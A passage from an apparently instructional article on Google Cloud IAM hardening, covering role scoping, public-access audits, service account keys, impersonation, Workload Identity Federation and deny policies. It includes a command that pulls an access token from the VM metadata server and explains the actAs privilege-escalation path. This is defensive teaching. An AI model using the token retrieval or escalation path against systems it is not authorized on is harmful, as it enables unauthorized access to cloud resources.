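    "bucket/prod-assets": "project/prod-web-app",
}

# Bindings set directly on each node: node -> list of (member, role).
DIRECT_BINDINGS = {
    "org/company.com": [("user:alice", "roles/viewer")],
    "folder/Production": [("group:developers", "roles/editor")],
}


def effective_bindings(node, parent=PARENT, direct=DIRECT_BINDINGS):
    """Collect (member, role, granted_at) for a node and every ancestor above it."""
    result = []
    current = node
    while current is not None:
        for member, role in direct.get(current, []):
            result.append((member, role, current))
        current = parent[current]  # walk one level up the hierarchy
    return result


if __name__ == "__main__":
    for member, role, granted_at in effective_bindings("bucket/prod-assets"):
        print(f"{member} holds {role} (granted at {granted_at})")
```

The bucket has no direct bindings in this sample, yet two principals reach it: one through the folder and one through the organization. The development project only sees the organization-level grant.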

# Understand your org structure before making changes
gcloud organizations list

gcloud resource-manager folders list --organization=ORG_ID

gcloud projects list --filter="parent.id=FOLDER_ID"

# See all existing bindings at the org level — do this regularly
gcloud organizations get-iam-policy ORG_ID --format=json | jq '.bindings[]'

Member Types — Who Can Hold a Binding

GCP uses the term member (being renamed to principal) for the identity in a binding:

Member Type | Format | Notes
Google Account | user:USER_EMAIL | Individual Google/Workspace account
Service Account | serviceAccount:SA_EMAIL | Machine identity
Google Group | group:GROUP_EMAIL | Workspace group
Workspace Domain | domain:company.com | All users in a Workspace domain
All Authenticated | allAuthenticatedUsers | Any authenticated Google identity; extremely broad
All Users | allUsers | Anonymous + authenticated; public access
Workload Identity | principal://iam.googleapis.com/... | External workloads via WIF

The ones that have caused data exposure incidents: allAuthenticatedUsers and allUsers. Any GCS bucket or GCP resource bound to allAuthenticatedUsers is accessible to any of the ~3 billion Google accounts in existence. I have seen production customer data exposed this way. A developer testing a public CDN pattern applied the binding to the wrong bucket.

Audit for these regularly:

# Find any project-level binding with allUsers or allAuthenticatedUsers
# (any(...) emits each matching binding once, even if it lists both members)
gcloud projects get-iam-policy my-project --format=json \
  | jq '.bindings[] | select(any(.members[]; . == "allUsers" or . == "allAuthenticatedUsers"))'

# Check a single GCS bucket for public access (repeat for each bucket in the project)
gsutil iam get gs://BUCKET_NAME \
  | grep -E "(allUsers|allAuthenticatedUsers)"
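
The same check can be run against a saved policy file. This is a minimal sketch, assuming a policy dictionary shaped like the JSON returned by get-iam-policy; the sample policy and the public_bindings helper are hypothetical.

```python
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# Hypothetical policy shaped like `gcloud projects get-iam-policy --format=json`.
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/storage.objectViewer",
         "members": ["allAuthenticatedUsers", "group:GROUP_EMAIL"]},
        {"role": "roles/bigquery.dataViewer",
         "members": ["user:USER_EMAIL"]},
    ]
}


def public_bindings(policy):
    """Return [(role, [public members])] for every binding exposed to public principals."""
    findings = []
    for binding in policy.get("bindings", []):
        exposed = sorted(PUBLIC_MEMBERS.intersection(binding.get("members", [])))
        if exposed:
            findings.append((binding["role"], exposed))
    return findings


if __name__ == "__main__":
    for role, members in public_bindings(SAMPLE_POLICY):
        print(f"PUBLIC: {role} granted to {', '.join(members)}")
```

Exact set membership is used instead of substring matching so that a member string that merely contains the text allUsers is not reported.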

Role Types — Choose the Right Granularity

Basic (Primitive) Roles — Don’t Use in Production

roles/viewer   → read access to most resources across the entire project
roles/editor   → read + write to most resources
roles/owner    → full access including IAM management

These are legacy roles from before GCP had service-specific roles. roles/editor is particularly dangerous because it grants write access across almost every GCP service in the project. Use it in production and you have no meaningful separation of duties between your services.

I’ve seen roles/editor granted to a data pipeline service account because “it needed access to BigQuery, Cloud Storage, and Pub/Sub.” All three of those have predefined roles. Three specific bindings. Instead: one broad role that also grants access to Cloud SQL, Kubernetes, Secret Manager, and Compute Engine — none of which the pipeline needed.

Predefined Roles — The Default Correct Choice

Service-specific roles managed and updated by Google. For most use cases, these are the right choice:

# Find predefined roles for Cloud Storage
gcloud iam roles list --filter="name:roles/storage" --format="table(name,title)"
# roles/storage.objectViewer   — read objects (not list buckets)
# roles/storage.objectCreator  — create objects, cannot read or delete
# roles/storage.objectAdmin    — full object control
# roles/storage.admin          — full bucket + object control (much broader)

# See exactly what permissions a predefined role includes
gcloud iam roles describe roles/storage.objectViewer

The distinction between roles/storage.objectViewer and roles/storage.admin is the difference between “can read objects” and “can read objects, create objects, delete objects, and modify bucket IAM policies.” Use the narrowest role that covers the actual need.
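
Picking the narrowest role is a set-cover question: which role contains every permission the workload needs, with the fewest extras? The sketch below assumes abbreviated, illustrative permission sets that are not the full role definitions; confirm the real contents with gcloud iam roles describe before relying on them. The narrowest_role helper is hypothetical.

```python
# Abbreviated, illustrative permission sets. These are NOT complete role definitions.
ROLE_PERMISSIONS = {
    "roles/storage.objectViewer": {"storage.objects.get", "storage.objects.list"},
    "roles/storage.objectCreator": {"storage.objects.create"},
    "roles/storage.objectAdmin": {
        "storage.objects.get", "storage.objects.list",
        "storage.objects.create", "storage.objects.delete",
    },
    "roles/storage.admin": {
        "storage.objects.get", "storage.objects.list",
        "storage.objects.create", "storage.objects.delete",
        "storage.buckets.get", "storage.buckets.delete",
        "storage.buckets.setIamPolicy",
    },
}


def narrowest_role(required, role_permissions=ROLE_PERMISSIONS):
    """Return the covering role with the fewest permissions, or None if none covers."""
    candidates = [
        (len(perms), name)
        for name, perms in role_permissions.items()
        if set(required) <= perms
    ]
    return min(candidates)[1] if candidates else None


if __name__ == "__main__":
    print(narrowest_role({"storage.objects.get"}))
    print(narrowest_role({"storage.objects.get", "storage.objects.delete"}))
```

A result of None is the signal that no predefined role in the candidate list fits, which is the point where a custom role becomes worth considering.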

Custom Roles — When Predefined Is Still Too Broad

When you need finer control than any predefined role offers, create a custom role:

cat > custom-log-reader.yaml << 'EOF'
title: "Log Reader"
description: "Read application logs from Cloud Logging — nothing else"
stage: "GA"
includedPermissions:
  - logging.logEntries.list
  - logging.logs.list
  - logging.logMetrics.get
  - logging.logMetrics.list
EOF

# Create at project level (available within one project)
gcloud iam roles create LogReader \
  --project=my-project \
  --file=custom-log-reader.yaml

# Or at org level (reusable across projects in the org)
gcloud iam roles create LogReader \
  --organization=ORG_ID \
  --file=custom-log-reader.yaml

# Grant the custom role
gcloud projects add-iam-policy-binding my-project \
  --member="serviceAccount:SA_EMAIL" \
  --role="projects/my-project/roles/LogReader"

Custom roles have an operational overhead: when Google adds new permissions to a service, predefined roles are updated automatically. Custom roles are not — you have to update them manually. For roles like “Log Reader” that are unlikely to need new permissions, this isn’t a concern. For roles like “App Admin” that span many services, it becomes a maintenance burden.


IAM Policy Bindings — How Access Is Actually Granted

The mechanism for granting access in GCP is adding a binding to a resource’s IAM policy. A binding is: member + role + (optional condition).

# Grant a role on a project (all resources in the project inherit this)
gcloud projects add-iam-policy-binding my-project \
  --member="user:ALICE_EMAIL" \
  --role="roles/storage.objectViewer"

# Grant on a specific GCS bucket (narrower — only this bucket)
gcloud storage buckets add-iam-policy-binding gs://prod-assets \
  --member="serviceAccount:SA_EMAIL" \
  --role="roles/storage.objectViewer"

# Grant on a specific BigQuery dataset (using a GRANT statement)
bq query --use_legacy_sql=false \
  'GRANT `roles/bigquery.dataViewer` ON SCHEMA `my-project.analytics_dataset` TO "group:GROUP_EMAIL"'

# View the current IAM policy on a project
gcloud projects get-iam-policy my-project --format=json

# View a specific resource's policy
gcloud storage buckets get-iam-policy gs://prod-assets

The choice between project-level and resource-level binding has real consequences. A binding on the GCS bucket affects only that bucket. A binding at the project level affects the bucket AND every other resource in the project. In practice, default to the most specific scope available. Only move up the hierarchy when the alternative is an unmanageable number of bindings.

Conditional Bindings — Time-Limited and Context-Scoped Access

Conditions scope when a binding applies. They use CEL (Common Expression Language):

# Temporary access for a contractor — automatically expires
gcloud projects add-iam-policy-binding my-project \
  --member="user:CONTRACTOR_EMAIL" \
  --role="roles/storage.objectViewer" \
  --condition="expression=request.time < timestamp('2026-06-30T00:00:00Z'),title=Contractor access Q2 2026"

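# Access only from corporate network
# Note: confirm that request.origin.ip is supported for your resource type in the
# IAM Conditions attribute reference; network-based restrictions are commonly
# enforced through Access Context Manager access levels instead
gcloud projects add-iam-policy-binding my-project \
  --member="user:USER_EMAIL" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.origin.ip.startsWith('10.0.'),title=Corp network only"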

Temporary access that automatically expires is one of the most practical applications of conditional bindings. Instead of “I’ll grant access and remember to remove it,” you set an expiry and it removes itself. The cognitive overhead of tracking temporary grants doesn’t disappear — you still need to know the grant exists — but the risk of it outliving its purpose drops significantly.
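
The expiry condition is a plain timestamp comparison, which makes it easy to reason about offline. This is a minimal sketch of the same check in Python, assuming RFC 3339 timestamps in UTC; it mirrors the CEL expression request.time < timestamp(...) but is not how IAM evaluates conditions internally, and the helper names are hypothetical.

```python
from datetime import datetime, timezone


def parse_rfc3339(value):
    """Parse a timestamp such as 2026-06-30T00:00:00Z into an aware datetime."""
    # Older Python versions reject a trailing "Z" in fromisoformat, so normalise it.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def binding_is_active(expiry, now):
    """Mirror the condition `request.time < timestamp(expiry)`."""
    return now < parse_rfc3339(expiry)


if __name__ == "__main__":
    expiry = "2026-06-30T00:00:00Z"
    print(binding_is_active(expiry, datetime.now(timezone.utc)))
```

The comparison is strict, so the grant stops applying at the expiry instant itself. The binding stays in the policy after that point and still needs cleaning up; it just no longer grants anything.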


Service Accounts — GCP’s Machine Identity

Service accounts are the machine identity in GCP. They should be used for every workload that needs to call GCP APIs — GCE instances, GKE pods, Cloud Functions, Cloud Run services.

# Create a service account
gcloud iam service-accounts create app-backend \
  --display-name="App Backend Service Account" \
  --project=my-project

SA_EMAIL="app-backend@my-project.iam.gserviceaccount.com"

# Grant it the specific role it needs — on the specific resource it needs
gcloud storage buckets add-iam-policy-binding gs://app-assets \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Attach to a GCE instance
gcloud compute instances create my-vm \
  --service-account="${SA_EMAIL}" \
  --scopes="cloud-platform" \
  --zone=us-central1-a

From inside the VM, Application Default Credentials (ADC) handles authentication automatically:

# From the VM — ADC uses the attached SA without any credential configuration
gcloud auth application-default print-access-token

# Or via the metadata server directly
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

Service Account Keys — The Antipattern to Avoid

A service account key is a JSON file containing a private key. It’s long-lived, it doesn’t expire automatically, and if it leaks it gives an attacker persistent access as that service account until someone discovers and revokes it.

# Creating a key — only if there is genuinely no alternative
gcloud iam service-accounts keys create key.json --iam-account="${SA_EMAIL}"
# This generates a long-lived credential. It will exist until explicitly deleted.

# List all active keys — do this in every audit
gcloud iam service-accounts keys list --iam-account="${SA_EMAIL}"

# Delete a key
gcloud iam service-accounts keys delete KEY_ID --iam-account="${SA_EMAIL}"

In the GCP environment I mentioned earlier — the one with roles/editor at the folder level — I also found 23 service account key files downloaded across the team’s laptops over 18 months. Nobody had a complete list of which keys were still valid and where they were stored. Several were for accounts that no longer existed. That’s not a hypothetical attack surface. It’s a breach waiting for a laptop to be stolen.

Never create service account keys when:

  • Code runs on GCE/GKE/Cloud Run/Cloud Functions: use the attached service account and ADC
  • Code runs in GitHub Actions: use Workload Identity Federation
  • Code runs on-premises with Kubernetes: use Workload Identity Federation with OIDC
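
Where keys already exist, an inventory by age is a useful first pass. The sketch below assumes key records shaped like the JSON output of gcloud iam service-accounts keys list, with keyType and validAfterTime fields; the sample records, the 90-day threshold, and the stale_user_keys helper are all hypothetical.

```python
from datetime import datetime, timedelta, timezone

# Hypothetical records shaped like `gcloud iam service-accounts keys list --format=json`.
SAMPLE_KEYS = [
    {"name": "projects/my-project/serviceAccounts/SA_EMAIL/keys/key-old",
     "keyType": "USER_MANAGED", "validAfterTime": "2024-01-10T09:00:00Z"},
    {"name": "projects/my-project/serviceAccounts/SA_EMAIL/keys/key-new",
     "keyType": "USER_MANAGED", "validAfterTime": "2025-05-20T09:00:00Z"},
    {"name": "projects/my-project/serviceAccounts/SA_EMAIL/keys/key-system",
     "keyType": "SYSTEM_MANAGED", "validAfterTime": "2024-01-01T00:00:00Z"},
]


def stale_user_keys(keys, now, max_age_days=90):
    """Return IDs of user-managed keys created more than max_age_days before now."""
    cutoff = now - timedelta(days=max_age_days)
    stale = []
    for key in keys:
        if key.get("keyType") != "USER_MANAGED":
            continue  # system-managed keys are rotated by Google
        created = datetime.fromisoformat(key["validAfterTime"].replace("Z", "+00:00"))
        if created < cutoff:
            stale.append(key["name"].rsplit("/", 1)[-1])
    return stale


if __name__ == "__main__":
    print(stale_user_keys(SAMPLE_KEYS, datetime.now(timezone.utc)))
```

Age alone does not say whether a key is still in use, so treat the output as a review queue rather than a deletion list.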

Service Account Impersonation — The Right Alternative to Keys

Instead of downloading a key, grant a user or service account permission to impersonate the service account. They generate a short-lived token, not a permanent credential:

# Allow alice to impersonate the service account
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --member="user:ALICE_EMAIL" \
  --role="roles/iam.serviceAccountTokenCreator"

# Alice generates a token for the SA — no key file, short-lived
gcloud auth print-access-token --impersonate-service-account="${SA_EMAIL}"

# Or make impersonation the default for subsequent gcloud commands
gcloud config set auth/impersonate_service_account "${SA_EMAIL}"
gcloud storage ls gs://app-assets  # runs as the SA

This is the right model for humans who need to act as service accounts for debugging or deployment: impersonate, use, done. The token expires. No file to manage.


Workload Identity Federation — Credentials Eliminated

The cleanest solution for any workload running outside GCP that needs to call GCP APIs: Workload Identity Federation. The external workload authenticates with its native identity (a GitHub Actions OIDC JWT, an AWS IAM role, a Kubernetes service account token), exchanges it for a short-lived GCP access token, and never handles a service account key.

# Create a Workload Identity Pool
gcloud iam workload-identity-pools create "github-actions-pool" \
  --project=my-project \
  --location=global \
  --display-name="GitHub Actions WIF Pool"

# Create a provider (GitHub OIDC)
gcloud iam workload-identity-pools providers create-oidc "github-provider" \
  --project=my-project \
  --location=global \
  --workload-identity-pool="github-actions-pool" \
  --issuer-uri="https://token.actions.githubusercontent.com" \
  --attribute-mapping="google.subject=assertion.sub,attribute.repository=assertion.repository" \
  --attribute-condition="assertion.repository_owner == 'my-org'"

# Allow a specific GitHub repo to impersonate the SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role="roles/iam.workloadIdentityUser" \
  --member="principalSet://iam.googleapis.com/projects/PROJECT_NUM/locations/global/workloadIdentityPools/github-actions-pool/attribute.repository/my-org/my-repo"

GitHub Actions workflow — no key files, no secrets stored in GitHub:

jobs:
  deploy:
    runs-on: ubuntu-latest
    permissions:
      id-token: write   # required for OIDC token request
      contents: read
    steps:
      - uses: actions/checkout@v4   # check out the repo before the auth step
      - uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: "projects/PROJECT_NUM/locations/global/workloadIdentityPools/github-actions-pool/providers/github-provider"
          service_account: "app-backend@my-project.iam.gserviceaccount.com"

      - run: gcloud storage cp dist/ gs://app-assets/ --recursive

The OIDC JWT from GitHub is presented to GCP, which verifies it against GitHub’s public keys, checks the attribute mapping and condition (only the specified repo can use this), and issues a short-lived GCP access token. The credential exists for the duration of the job and is then gone.
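
The mapping and condition steps of that exchange can be sketched as plain functions. This is a simplified model, assuming the token signature has already been verified; it uses the GitHub claim names sub, repository, and repository_owner, while the function names and sample claims are hypothetical and not part of any Google library.

```python
def map_attributes(claims):
    """Apply the provider's attribute mapping to already-verified JWT claims."""
    return {
        "google.subject": claims.get("sub"),
        "attribute.repository": claims.get("repository"),
    }


def exchange_allowed(claims, allowed_owner, allowed_repository):
    """Model the two gates: the provider condition, then the service account binding."""
    # Provider-level attribute condition: assertion.repository_owner == 'my-org'
    if claims.get("repository_owner") != allowed_owner:
        return False
    # Service account binding on principalSet .../attribute.repository/my-org/my-repo
    return map_attributes(claims)["attribute.repository"] == allowed_repository


if __name__ == "__main__":
    # Hypothetical claims for a workflow run on the main branch.
    claims = {
        "sub": "repo:my-org/my-repo:ref:refs/heads/main",
        "repository": "my-org/my-repo",
        "repository_owner": "my-org",
    }
    print(exchange_allowed(claims, "my-org", "my-org/my-repo"))
```

Keeping the owner check at the provider and the repository check at the binding means a second repository in the same organization passes the first gate but still cannot impersonate this service account.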


IAM Deny Policies — Org-Wide Guardrails

GCP added standalone deny policies separate from bindings. They override grants:

cat > deny-iam-escalation.json << 'EOF'
{
  "displayName": "Deny IAM escalation permissions to non-admins",
  "rules": [{
    "denyRule": {
      "deniedPrincipals": ["principalSet://goog/group/GROUP_EMAIL"],
      "deniedPermissions": [
        "iam.googleapis.com/roles.create",
        "iam.googleapis.com/roles.update",
        "iam.googleapis.com/serviceAccounts.actAs"
      ]
    }
  }]
}
EOF

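# The attachment point must be URL-encoded, and --kind selects deny policies
gcloud iam policies create deny-iam-escalation-policy \
  --attachment-point="cloudresourcemanager.googleapis.com%2Fprojects%2Fmy-project" \
  --kind=denypolicies \
  --policy-file=deny-iam-escalation.json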

iam.serviceAccounts.actAs is worth calling out specifically. It’s the GCP equivalent of AWS’s iam:PassRole — it allows an identity to make a service act as a specified service account. If a developer can call actAs on a high-privileged service account, they can launch a GCE instance using that service account and then operate with its permissions. Same privilege escalation pattern as iam:PassRole, different name. Deny it for anyone who doesn’t explicitly need it.
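
The override behaviour can be illustrated with a small evaluation function. This is a simplified sketch, assuming group-based principals and short permission names; it ignores deny-rule exceptions and conditions, and the is_allowed helper and sample data are hypothetical.

```python
def is_allowed(principal_groups, permission, allow_grants, deny_rules):
    """Evaluate deny rules first, then allow grants; default to no access.

    allow_grants and deny_rules are lists of (group, set_of_permissions).
    """
    for group, permissions in deny_rules:
        if group in principal_groups and permission in permissions:
            return False  # a matching deny wins regardless of any grant
    for group, permissions in allow_grants:
        if group in principal_groups and permission in permissions:
            return True
    return False  # nothing granted the permission


# Hypothetical data: developers are granted actAs by a binding, then denied by policy.
ALLOW = [("developers", {"iam.serviceAccounts.actAs", "storage.objects.get"})]
DENY = [("developers", {"iam.serviceAccounts.actAs", "iam.roles.create"})]

if __name__ == "__main__":
    print(is_allowed({"developers"}, "iam.serviceAccounts.actAs", ALLOW, DENY))
    print(is_allowed({"developers"}, "storage.objects.get", ALLOW, DENY))
```

In this sample the developer group keeps object read access but loses actAs, even though a binding grants it. That is the guardrail effect: the deny rule does not need to know which binding handed out the permission.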


⚠ Production Gotchas

roles/editor at folder level is a blast radius waiting to happen
The role sounds like “edit access.” At folder level it means edit access to every service in every project under that folder — including services nobody thought to trace. Always scope to the specific project or resource, never a folder unless the use case explicitly requires it.

allAuthenticatedUsers on a GCS bucket is public to 3 billion accounts
Any Google account — personal Gmail included — qualifies as “authenticated.” I’ve seen production customer data exposed this way while a developer tested a CDN pattern on the wrong bucket. Audit for these bindings before they become a breach notification.

Service account keys accumulate and nobody tracks them
In every GCP environment I’ve audited that allowed SA key creation, there were active keys for accounts that no longer existed, stored on laptops with no central inventory. Keys don’t expire. Audit with gcloud iam service-accounts keys list across every SA in every project.

iam.serviceAccounts.actAs is a privilege escalation path
If a principal can call actAs on a high-privileged SA, they can launch a GCE instance with that SA and operate with its full permissions — without ever being directly granted those permissions. Block this with a deny policy for everyone who doesn’t explicitly need it.

Org-level roles/viewer is not a safe broad grant
Read access to every project config, every service configuration, every infrastructure metadata object across your entire GCP estate is not a benign grant. Treat any binding above the project level as high-blast-radius, regardless of the role.


Quick Reference

# Audit org and folder structure before any high-level change
gcloud organizations list
gcloud resource-manager folders list --organization=ORG_ID
gcloud projects list --filter="parent.id=FOLDER_ID"

# Inspect all bindings at org level
gcloud organizations get-iam-policy ORG_ID --format=json | jq '.bindings[]'

# Find allUsers / allAuthenticatedUsers in a project
gcloud projects get-iam-policy PROJECT_ID --format=json \
  | jq '.bindings[] | select(any(.members[]; . == "allUsers" or . == "allAuthenticatedUsers"))'

# Check a GCS bucket for public access
gsutil iam get gs://BUCKET_NAME | grep -E "(allUsers|allAuthenticatedUsers)"

# Audit all user-managed SA keys across a project
gcloud iam service-accounts list --project=PROJECT_ID --format="value(email)" \
  | xargs -I{} gcloud iam service-accounts keys list --iam-account={} --managed-by=user

# List predefined roles for a service
gcloud iam roles list --filter="name:roles/storage" --format="table(name,title)"

# Inspect what permissions a role actually includes
gcloud iam roles describe roles/storage.objectViewer

# Grant time-limited access with conditional binding
gcloud projects add-iam-policy-binding PROJECT_ID \
  --member="user:CONTRACTOR_EMAIL" \
  --role="roles/storage.objectViewer" \
  --condition="expression=request.time < timestamp('2026-06-30T00:00:00Z'),title=Contractor Q2 2026"

# Enable SA impersonation (avoids key creation)
gcloud iam service-accounts add-iam-policy-binding SA_EMAIL \
  --member="user:ALICE_EMAIL" \
  --role="roles/iam.serviceAccountTokenCreator"

Framework Alignment

Framework | Reference | What It Covers Here
CISSP | Domain 5: Identity and Access Management | GCP’s hierarchical model and service account patterns are the primary IAM constructs for GCP environments
CISSP | Domain 3: Security Architecture | Resource hierarchy design determines access inheritance; these are architectural decisions with direct security implications
ISO 27001:2022 | 5.15 Access control | GCP IAM bindings are the technical implementation of access control policy in GCP environments
ISO 27001:2022 | 5.18 Access rights | Service account provisioning, conditional bindings with expiry, and workload identity federation
ISO 27001:2022 | 8.2 Privileged access rights | Folder/org-level bindings and basic roles represent the highest-risk privilege grants in GCP
SOC 2 | CC6.1 | IAM bindings and Workload Identity Federation address machine identity controls for CC6.1
SOC 2 | CC6.3 | Conditional bindings with time-bound expiry directly satisfy access removal requirements

Key Takeaways

  • GCP IAM is hierarchical — bindings inherit downward; a binding at org or folder level has much larger scope than it appears
  • Basic roles (viewer/editor/owner) are too coarse for production; use predefined or custom roles and grant at the narrowest scope
  • Service account keys are a long-lived credential antipattern; use ADC on GCP infrastructure, impersonation for humans, and Workload Identity Federation for external workloads
  • allAuthenticatedUsers and allUsers bindings expose resources to the internet — audit for these in every environment
  • iam.serviceAccounts.actAs is a privilege escalation vector — treat it like iam:PassRole
  • Conditional bindings with expiry dates are better than “I’ll remember to remove this later”

What’s Next

EP06 covers Azure RBAC and Entra ID — the most directory-centric of the three models, where Active Directory’s 25 years of enterprise history shapes both the strengths and the complexity of Azure’s access control.

Next: Azure RBAC Scopes — Management Groups, Subscriptions, and how role inheritance works across the Microsoft estate.
